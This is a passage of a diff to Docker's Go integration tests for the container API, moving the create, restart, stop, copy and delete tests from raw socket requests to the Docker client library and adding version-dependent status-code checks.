TestContainerAPICreateMultipleNetworksConfig(c *check.C) { // Container creation must fail if client specified configurations for more than one network - config := map[string]interface{}{ - "Image": "busybox", - "NetworkingConfig": networktypes.NetworkingConfig{ - EndpointsConfig: map[string]*networktypes.EndpointSettings{ - "net1": {}, - "net2": {}, - "net3": {}, - }, + config := containertypes.Config{ + Image: "busybox", + } + + networkingConfig := networktypes.NetworkingConfig{ + EndpointsConfig: map[string]*networktypes.EndpointSettings{ + "net1": {}, + "net2": {}, + "net3": {}, }, } - status, body, err := sockRequest("POST", "/containers/create", config) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusBadRequest) - msg := getErrorMessage(c, body) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networkingConfig, "") + msg := err.Error() // network name order in error message is not deterministic c.Assert(msg, checker.Contains, "Container cannot be connected to network endpoints") c.Assert(msg, checker.Contains, "net1") @@ -564,48 +624,25 @@ func (s *DockerSuite) TestContainerAPICreateMultipleNetworksConfig(c *check.C) { } func (s *DockerSuite) TestContainerAPICreateWithHostName(c *check.C) { - hostName := "test-host" - config := map[string]interface{}{ - "Image": "busybox", - "Hostname": hostName, - } - - status, body, err := sockRequest("POST", "/containers/create", config) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) - - var container containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), checker.IsNil) - - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - - var containerJSON types.ContainerJSON - c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) - c.Assert(containerJSON.Config.Hostname, checker.Equals, hostName, check.Commentf("Mismatched Hostname")) -} - -func (s *DockerSuite) TestContainerAPICreateWithDomainName(c *check.C) { domainName := "test-domain" - config := map[string]interface{}{ - "Image": "busybox", - "Domainname": domainName, + hostName := "test-hostname" + config := containertypes.Config{ + Image: "busybox", + Hostname: hostName, + Domainname: domainName, } - status, body, err := sockRequest("POST", "/containers/create", config) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + defer cli.Close() - var container containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), checker.IsNil) + container, err := cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "") + c.Assert(err, checker.IsNil) - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + containerJSON, err := cli.ContainerInspect(context.Background(), container.ID) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - var containerJSON types.ContainerJSON - c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) + c.Assert(containerJSON.Config.Hostname, checker.Equals, hostName, check.Commentf("Mismatched Hostname")) c.Assert(containerJSON.Config.Domainname, checker.Equals, domainName, check.Commentf("Mismatched Domainname")) } @@ -622,51 +659,51 @@ func (s *DockerSuite) TestContainerAPICreateOtherNetworkModes(c *check.C) { UtilCreateNetworkMode(c, "container:web1") } -func UtilCreateNetworkMode(c *check.C, networkMode string) { - config := map[string]interface{}{ - "Image": "busybox", - "HostConfig": map[string]interface{}{"NetworkMode": networkMode}, +func UtilCreateNetworkMode(c *check.C, networkMode containertypes.NetworkMode) { + config := containertypes.Config{ + Image: "busybox", } - status, body, err := sockRequest("POST", "/containers/create", config) + hostConfig := containertypes.HostConfig{ + NetworkMode: networkMode, + } + + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + defer cli.Close() - var container containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), checker.IsNil) + container, err := cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "") + c.Assert(err, checker.IsNil) - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + containerJSON, err := cli.ContainerInspect(context.Background(), container.ID) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - var containerJSON types.ContainerJSON - c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) c.Assert(containerJSON.HostConfig.NetworkMode, checker.Equals, containertypes.NetworkMode(networkMode), check.Commentf("Mismatched NetworkMode")) } func (s *DockerSuite) TestContainerAPICreateWithCpuSharesCpuset(c *check.C) { // TODO Windows to Windows CI. The CpuShares part could be ported. testRequires(c, DaemonIsLinux) - config := map[string]interface{}{ - "Image": "busybox", - "CpuShares": 512, - "CpusetCpus": "0", + config := containertypes.Config{ + Image: "busybox", } - status, body, err := sockRequest("POST", "/containers/create", config) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) - - var container containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), checker.IsNil) + hostConfig := containertypes.HostConfig{ + Resources: containertypes.Resources{ + CPUShares: 512, + CpusetCpus: "0", + }, + } - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + defer cli.Close() - var containerJSON types.ContainerJSON + container, err := cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "") + c.Assert(err, checker.IsNil) - c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) + containerJSON, err := cli.ContainerInspect(context.Background(), container.ID) + c.Assert(err, checker.IsNil) out := inspectField(c, containerJSON.ID, "HostConfig.CpuShares") c.Assert(out, checker.Equals, "512") @@ -683,19 +720,29 @@ func (s *DockerSuite) TestContainerAPIVerifyHeader(c *check.C) { create := func(ct string) (*http.Response, io.ReadCloser, error) { jsonData := bytes.NewBuffer(nil) c.Assert(json.NewEncoder(jsonData).Encode(config), checker.IsNil) - return sockRequestRaw("POST", "/containers/create", jsonData, ct) + return request.Post("/containers/create", request.RawContent(ioutil.NopCloser(jsonData)), request.ContentType(ct)) } // Try with no content-type res, body, err := create("") c.Assert(err, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + // todo: we need to figure out a better way to compare between dockerd versions + // comparing between daemon API version is not precise. + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } body.Close() // Try with wrong content-type res, body, err = create("application/xml") c.Assert(err, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } body.Close() // now application/json @@ -719,11 +766,15 @@ func (s *DockerSuite) TestContainerAPIInvalidPortSyntax(c *check.C) { } }` - res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(string(b[:]), checker.Contains, "invalid port") } @@ -739,11 +790,15 @@ func (s *DockerSuite) TestContainerAPIRestartPolicyInvalidPolicyName(c *check.C) } }` - res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(string(b[:]), checker.Contains, "invalid restart policy") } @@ -759,11 +814,15 @@ func (s *DockerSuite) TestContainerAPIRestartPolicyRetryMismatch(c *check.C) { } }` - res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(string(b[:]), checker.Contains, "maximum retry count cannot be used with restart policy") } @@ -779,11 +838,15 @@ func (s *DockerSuite) TestContainerAPIRestartPolicyNegativeRetryCount(c *check.C } }` - res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(string(b[:]), checker.Contains, "maximum retry count cannot be negative") } @@ -799,7 +862,7 @@ func (s *DockerSuite) TestContainerAPIRestartPolicyDefaultRetryCount(c *check.C) } }` - res, _, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + res, _, err := request.Post("/containers/create", request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) } @@ -830,11 +893,11 @@ func (s *DockerSuite) TestContainerAPIPostCreateNull(c *check.C) { "NetworkDisabled":false, "OnBuild":null}` - res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) type createResp struct { ID string @@ -861,12 +924,16 @@ func (s *DockerSuite) TestCreateWithTooLowMemoryLimit(c *check.C) { "Memory": 524287 }` - res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) - b, err2 := readBody(body) + b, err2 := request.ReadBody(body) c.Assert(err2, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } c.Assert(string(b), checker.Contains, "Minimum memory limit allowed is 4MB") } @@ -875,10 +942,13 @@ func (s *DockerSuite) TestContainerAPIRename(c *check.C) { containerID := strings.TrimSpace(out) newName := "TestContainerAPIRenameNew" - statusCode, _, err := sockRequest("POST", "/containers/"+containerID+"/rename?name="+newName, nil) + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + err = cli.ContainerRename(context.Background(), containerID, newName) c.Assert(err, checker.IsNil) - // 204 No Content is expected, not 200 - c.Assert(statusCode, checker.Equals, http.StatusNoContent) name := inspectField(c, containerID, "Name") c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container")) @@ -888,9 +958,12 @@ func (s *DockerSuite) TestContainerAPIKill(c *check.C) { name := "test-api-kill" runSleepingContainer(c, "-i", "--name", name) - status, _, err := sockRequest("POST", "/containers/"+name+"/kill", nil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + err = cli.ContainerKill(context.Background(), name, "SIGKILL") c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) state := inspectField(c, name, "State.Running") c.Assert(state, checker.Equals, "false", check.Commentf("got wrong State from container %s: %q", name, state)) @@ -899,83 +972,99 @@ func (s *DockerSuite) TestContainerAPIKill(c *check.C) { func (s *DockerSuite) TestContainerAPIRestart(c *check.C) { name := "test-api-restart" runSleepingContainer(c, "-di", "--name", name) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - status, _, err := sockRequest("POST", "/containers/"+name+"/restart?t=1", nil) + timeout := 1 * time.Second + err = cli.ContainerRestart(context.Background(), name, &timeout) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(waitInspect(name, "{{ .State.Restarting }} {{ .State.Running }}", "false true", 15*time.Second), checker.IsNil) } func (s *DockerSuite) TestContainerAPIRestartNotimeoutParam(c *check.C) { name := "test-api-restart-no-timeout-param" - out, _ := runSleepingContainer(c, "-di", "--name", name) + out := runSleepingContainer(c, "-di", "--name", name) id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) - status, _, err := sockRequest("POST", "/containers/"+name+"/restart", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) + defer cli.Close() + + err = cli.ContainerRestart(context.Background(), name, nil) + c.Assert(err, checker.IsNil) + c.Assert(waitInspect(name, "{{ .State.Restarting }} {{ .State.Running }}", "false true", 15*time.Second), checker.IsNil) } func (s *DockerSuite) TestContainerAPIStart(c *check.C) { name := "testing-start" - config := map[string]interface{}{ - "Image": "busybox", - "Cmd": append([]string{"/bin/sh", "-c"}, sleepCommandForDaemonPlatform()...), - "OpenStdin": true, + config := containertypes.Config{ + Image: "busybox", + Cmd: append([]string{"/bin/sh", "-c"}, sleepCommandForDaemonPlatform()...), + OpenStdin: true, } - status, _, err := sockRequest("POST", "/containers/create?name="+name, config) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, name) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) - status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil) + err = cli.ContainerStart(context.Background(), name, types.ContainerStartOptions{}) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) // second call to start should give 304 - status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil) + // maybe add ContainerStartWithRaw to test it + err = cli.ContainerStart(context.Background(), name, types.ContainerStartOptions{}) c.Assert(err, checker.IsNil) // TODO(tibor): figure out why this doesn't work on windows - if isLocalDaemon { - c.Assert(status, checker.Equals, http.StatusNotModified) - } } func (s *DockerSuite) TestContainerAPIStop(c *check.C) { name := "test-api-stop" runSleepingContainer(c, "-i", "--name", name) + timeout := 30 * time.Second + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - status, _, err := sockRequest("POST", "/containers/"+name+"/stop?t=30", nil) + err = cli.ContainerStop(context.Background(), name, &timeout) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) c.Assert(waitInspect(name, "{{ .State.Running }}", "false", 60*time.Second), checker.IsNil) // second call to start should give 304 - status, _, err = sockRequest("POST", "/containers/"+name+"/stop?t=30", nil) + // maybe add ContainerStartWithRaw to test it + err = cli.ContainerStop(context.Background(), name, &timeout) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotModified) } func (s *DockerSuite) TestContainerAPIWait(c *check.C) { name := "test-api-wait" sleepCmd := "/bin/sleep" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { sleepCmd = "sleep" } dockerCmd(c, "run", "--name", name, "busybox", sleepCmd, "2") - status, body, err := sockRequest("POST", "/containers/"+name+"/wait", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - c.Assert(waitInspect(name, "{{ .State.Running }}", "false", 60*time.Second), checker.IsNil) + defer cli.Close() + + waitresC, errC := cli.ContainerWait(context.Background(), name, "") - var waitres containertypes.ContainerWaitOKBody - c.Assert(json.Unmarshal(body, &waitres), checker.IsNil) - c.Assert(waitres.StatusCode, checker.Equals, int64(0)) + select { + case err = <-errC: + c.Assert(err, checker.IsNil) + case waitres := <-waitresC: + c.Assert(waitres.StatusCode, checker.Equals, int64(0)) + } } func (s *DockerSuite) TestContainerAPICopyNotExistsAnyMore(c *check.C) { @@ -985,10 +1074,10 @@ func (s *DockerSuite) TestContainerAPICopyNotExistsAnyMore(c *check.C) { postData := types.CopyConfig{ Resource: "/test.txt", } - - status, _, err := sockRequest("POST", "/containers/"+name+"/copy", postData) + // no copy in client/ + res, _, err := request.Post("/containers/"+name+"/copy", request.JSONBody(postData)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotFound) + c.Assert(res.StatusCode, checker.Equals, http.StatusNotFound) } func (s *DockerSuite) TestContainerAPICopyPre124(c *check.C) { @@ -1000,12 +1089,12 @@ func (s *DockerSuite) TestContainerAPICopyPre124(c *check.C) { Resource: "/test.txt", } - status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData) + res, body, err := request.Post("/v1.23/containers/"+name+"/copy", request.JSONBody(postData)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) found := false - for tarReader := tar.NewReader(bytes.NewReader(body)); ; { + for tarReader := tar.NewReader(body); ; { h, err := tarReader.Next() if err != nil { if err == io.EOF { @@ -1021,7 +1110,7 @@ func (s *DockerSuite) TestContainerAPICopyPre124(c *check.C) { c.Assert(found, checker.True) } -func (s *DockerSuite) TestContainerAPICopyResourcePathEmptyPr124(c *check.C) { +func (s *DockerSuite) TestContainerAPICopyResourcePathEmptyPre124(c *check.C) { testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later name := "test-container-api-copy-resource-empty" dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test.txt") @@ -1030,10 +1119,16 @@ func (s *DockerSuite) TestContainerAPICopyResourcePathEmptyPr124(c *check.C) { Resource: "", } - status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData) + res, body, err := request.Post("/v1.23/containers/"+name+"/copy", request.JSONBody(postData)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) - c.Assert(string(body), checker.Matches, "Path cannot be empty\n") + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } + b, err := request.ReadBody(body) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Matches, "Path cannot be empty\n") } func (s *DockerSuite) TestContainerAPICopyResourcePathNotFoundPre124(c *check.C) { @@ -1045,10 +1140,16 @@ func (s *DockerSuite) TestContainerAPICopyResourcePathNotFoundPre124(c *check.C) Resource: "/notexist", } - status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData) + res, body, err := request.Post("/v1.23/containers/"+name+"/copy", request.JSONBody(postData)) + c.Assert(err, checker.IsNil) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, checker.Equals, http.StatusNotFound) + } + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) - c.Assert(string(body), checker.Matches, "Could not find the file /notexist in container "+name+"\n") + c.Assert(string(b), checker.Matches, "Could not find the file /notexist in container "+name+"\n") } func (s *DockerSuite) TestContainerAPICopyContainerNotFoundPr124(c *check.C) { @@ -1057,40 +1158,51 @@ func (s *DockerSuite) TestContainerAPICopyContainerNotFoundPr124(c *check.C) { Resource: "/something", } - status, _, err := sockRequest("POST", "/v1.23/containers/notexists/copy", postData) + res, _, err := request.Post("/v1.23/containers/notexists/copy", request.JSONBody(postData)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotFound) + c.Assert(res.StatusCode, checker.Equals, http.StatusNotFound) } func (s *DockerSuite) TestContainerAPIDelete(c *check.C) { - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) dockerCmd(c, "stop", id) - status, _, err := sockRequest("DELETE", "/containers/"+id, nil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + err = cli.ContainerRemove(context.Background(), id, types.ContainerRemoveOptions{}) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) } func (s *DockerSuite) TestContainerAPIDeleteNotExist(c *check.C) { - status, body, err := sockRequest("DELETE", "/containers/doesnotexist", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotFound) - c.Assert(getErrorMessage(c, body), checker.Matches, "No such container: doesnotexist") + defer cli.Close() + + err = cli.ContainerRemove(context.Background(), "doesnotexist", types.ContainerRemoveOptions{}) + c.Assert(err.Error(), checker.Contains, "No such container: doesnotexist") } func (s *DockerSuite) TestContainerAPIDeleteForce(c *check.C) { - out, _ := runSleepingContainer(c) - + out := runSleepingContainer(c) id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) - status, _, err := sockRequest("DELETE", "/containers/"+id+"?force=1", nil) + removeOptions := types.ContainerRemoveOptions{ + Force: true, + } + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + err = cli.ContainerRemove(context.Background(), id, removeOptions) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) } func (s *DockerSuite) TestContainerAPIDeleteRemoveLinks(c *check.C) { @@ -1109,34 +1221,45 @@ func (s *DockerSuite) TestContainerAPIDeleteRemoveLinks(c *check.C) { links := inspectFieldJSON(c, id2, "HostConfig.Links") c.Assert(links, checker.Equals, "[\"/tlink1:/tlink2/tlink1\"]", check.Commentf("expected to have links between containers")) - status, b, err := sockRequest("DELETE", "/containers/tlink2/tlink1?link=1", nil) + removeOptions := types.ContainerRemoveOptions{ + RemoveLinks: true, + } + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + err = cli.ContainerRemove(context.Background(), "tlink2/tlink1", removeOptions) c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusNoContent, check.Commentf(string(b))) linksPostRm := inspectFieldJSON(c, id2, "HostConfig.Links") c.Assert(linksPostRm, checker.Equals, "null", check.Commentf("call to api deleteContainer links should have removed the specified links")) } func (s *DockerSuite) TestContainerAPIDeleteConflict(c *check.C) { - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) - status, _, err := sockRequest("DELETE", "/containers/"+id, nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusConflict) + defer cli.Close() + + err = cli.ContainerRemove(context.Background(), id, types.ContainerRemoveOptions{}) + expected := "cannot remove a running container" + c.Assert(err.Error(), checker.Contains, expected) } func (s *DockerSuite) TestContainerAPIDeleteRemoveVolume(c *check.C) { testRequires(c, SameHostDaemon) vol := "/testvolume" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { vol = `c:\testvolume` } - out, _ := runSleepingContainer(c, "-v", vol) + out := runSleepingContainer(c, "-v", vol) id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) @@ -1145,73 +1268,81 @@ func (s *DockerSuite) TestContainerAPIDeleteRemoveVolume(c *check.C) { _, err = os.Stat(source) c.Assert(err, checker.IsNil) - status, _, err := sockRequest("DELETE", "/containers/"+id+"?v=1&force=1", nil) + removeOptions := types.ContainerRemoveOptions{ + Force: true, + RemoveVolumes: true, + } + + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) + defer cli.Close() + + err = cli.ContainerRemove(context.Background(), id, removeOptions) + c.Assert(err, check.IsNil) + _, err = os.Stat(source) c.Assert(os.IsNotExist(err), checker.True, check.Commentf("expected to get ErrNotExist error, got %v", err)) } // Regression test for https://github.com/docker/docker/issues/6231 func (s *DockerSuite) TestContainerAPIChunkedEncoding(c *check.C) { - conn, err := sockConn(time.Duration(10*time.Second), "") - c.Assert(err, checker.IsNil) - client := httputil.NewClientConn(conn, nil) - defer client.Close() config := map[string]interface{}{ "Image": "busybox", "Cmd": append([]string{"/bin/sh", "-c"}, sleepCommandForDaemonPlatform()...), "OpenStdin": true, } - b, err := json.Marshal(config) - c.Assert(err, checker.IsNil) - - req, err := http.NewRequest("POST", "/containers/create", bytes.NewBuffer(b)) - c.Assert(err, checker.IsNil) - req.Header.Set("Content-Type", "application/json") - // This is a cheat to make the http request do chunked encoding - // Otherwise (just setting the Content-Encoding to chunked) net/http will overwrite - // https://golang.org/src/pkg/net/http/request.go?s=11980:12172 - req.ContentLength = -1 - resp, err := client.Do(req) + resp, _, err := request.Post("/containers/create", request.JSONBody(config), request.With(func(req *http.Request) error { + // This is a cheat to make the http request do chunked encoding + // Otherwise (just setting the Content-Encoding to chunked) net/http will overwrite + // https://golang.org/src/pkg/net/http/request.go?s=11980:12172 + req.ContentLength = -1 + return nil + })) c.Assert(err, checker.IsNil, check.Commentf("error creating container with chunked encoding")) - resp.Body.Close() + defer resp.Body.Close() c.Assert(resp.StatusCode, checker.Equals, http.StatusCreated) } func (s *DockerSuite) TestContainerAPIPostContainerStop(c *check.C) { - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) containerID := strings.TrimSpace(out) c.Assert(waitRun(containerID), checker.IsNil) - statusCode, _, err := sockRequest("POST", "/containers/"+containerID+"/stop", nil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + err = cli.ContainerStop(context.Background(), containerID, nil) c.Assert(err, checker.IsNil) - // 204 No Content is expected, not 200 - c.Assert(statusCode, checker.Equals, http.StatusNoContent) c.Assert(waitInspect(containerID, "{{ .State.Running }}", "false", 60*time.Second), checker.IsNil) } // #14170 func (s *DockerSuite) TestPostContainerAPICreateWithStringOrSliceEntrypoint(c *check.C) { - config := struct { - Image string - Entrypoint string - Cmd []string - }{"busybox", "echo", []string{"hello", "world"}} - _, _, err := sockRequest("POST", "/containers/create?name=echotest", config) + config := containertypes.Config{ + Image: "busybox", + Entrypoint: []string{"echo"}, + Cmd: []string{"hello", "world"}, + } + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "echotest") c.Assert(err, checker.IsNil) out, _ := dockerCmd(c, "start", "-a", "echotest") c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") config2 := struct { Image string - Entrypoint []string + Entrypoint string Cmd []string - }{"busybox", []string{"echo"}, []string{"hello", "world"}} - _, _, err = sockRequest("POST", "/containers/create?name=echotest2", config2) + }{"busybox", "echo", []string{"hello", "world"}} + _, _, err = request.Post("/containers/create?name=echotest2", request.JSONBody(config2)) c.Assert(err, checker.IsNil) out, _ = dockerCmd(c, "start", "-a", "echotest2") c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") @@ -1219,21 +1350,26 @@ func (s *DockerSuite) TestPostContainerAPICreateWithStringOrSliceEntrypoint(c *c // #14170 func (s *DockerSuite) TestPostContainersCreateWithStringOrSliceCmd(c *check.C) { - config := struct { - Image string - Entrypoint string - Cmd string - }{"busybox", "echo", "hello world"} - _, _, err := sockRequest("POST", "/containers/create?name=echotest", config) + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"echo", "hello", "world"}, + } + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "echotest") c.Assert(err, checker.IsNil) out, _ := dockerCmd(c, "start", "-a", "echotest") c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") config2 := struct { - Image string - Cmd []string - }{"busybox", []string{"echo", "hello", "world"}} - _, _, err = sockRequest("POST", "/containers/create?name=echotest2", config2) + Image string + Entrypoint string + Cmd string + }{"busybox", "echo", "hello world"} + _, _, err = request.Post("/containers/create?name=echotest2", request.JSONBody(config2)) c.Assert(err, checker.IsNil) out, _ = dockerCmd(c, "start", "-a", "echotest2") c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") @@ -1248,29 +1384,38 @@ func (s *DockerSuite) TestPostContainersCreateWithStringOrSliceCapAddDrop(c *che CapAdd string CapDrop string }{"busybox", "NET_ADMIN", "SYS_ADMIN"} - status, _, err := sockRequest("POST", "/containers/create?name=capaddtest0", config) + res, _, err := request.Post("/containers/create?name=capaddtest0", request.JSONBody(config)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + 